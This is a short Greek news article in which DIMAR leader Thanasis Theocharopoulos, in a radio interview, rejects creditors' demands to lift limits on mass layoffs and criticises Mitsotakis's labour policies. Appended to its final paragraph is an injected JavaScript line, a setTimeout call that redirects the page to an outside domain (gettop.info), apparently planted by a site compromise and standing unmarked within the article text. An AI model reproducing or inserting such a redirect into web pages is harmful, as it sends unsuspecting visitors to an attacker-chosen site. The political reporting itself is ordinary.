Θεοχαρόπουλος: Απαράδεκτη η άρση του περιορισμού των ομαδικών απολύσεων

0
3

 

Mιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM» ο πρόεδρος της ΔΗΜΑΡ, Θανάσης Θεοχαρόπουλος χαρακτήρισε απαράδεκτη «οποιαδήποτε νέα επιμονή των εταίρων για την άρση του περιορισμού των ομαδικών απολύσεων«.

«Πρόκειται για μια ιδεολογική νεοφιλελεύθερη εμμονή» που «σε μία αγορά εργασίας με 25% ανεργία δεν θα φέρει κανένα αποτέλεσμα», σημείωσε και τόνισε ότι θα πρέπει «να φύγει από το τραπέζι το lock out, η ανταπεργία των εργοδοτών«, ενώ για τον συνδικαλιστικό νόμο σημείωσε πως «θα πρέπει να δούμε και ποιες αλλαγές χρειάζονται«.

«Χρειάζεται να αναδιαρθρωθεί ο συνδικαλιστικό νόμος, αλλά σε συμφωνία με τους κοινωνικούς και θεσμικούς φορείς της χώρας, όχι σε σύγκρουση και όχι με βάση τις ιδεολογικές εμμονές ορισμένων εταίρων«, επεσήμανε ο κ. Θεοχαρόπουλος.

Σχολιάζοντας δηλώσεις του προέδρου της Νέας Δημοκρατίας για τα εργασιακά, σημείωσε: «Δεν είναι ιδεοληψία το θέμα των συλλογικών συμβάσεων και η επεκτασιμότητα των συλλογικών συμβάσεων. Δεν είναι ιδεοληψία το θέμα των ομαδικών απολύσεων. Αυτό το νεοφιλελεύθερο κουστούμι που φέρνει και ξαναφέρνει και φοράει ο κ. Μητσοτάκης δεν αποτελεί λύση για τη χώρα σήμερα«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here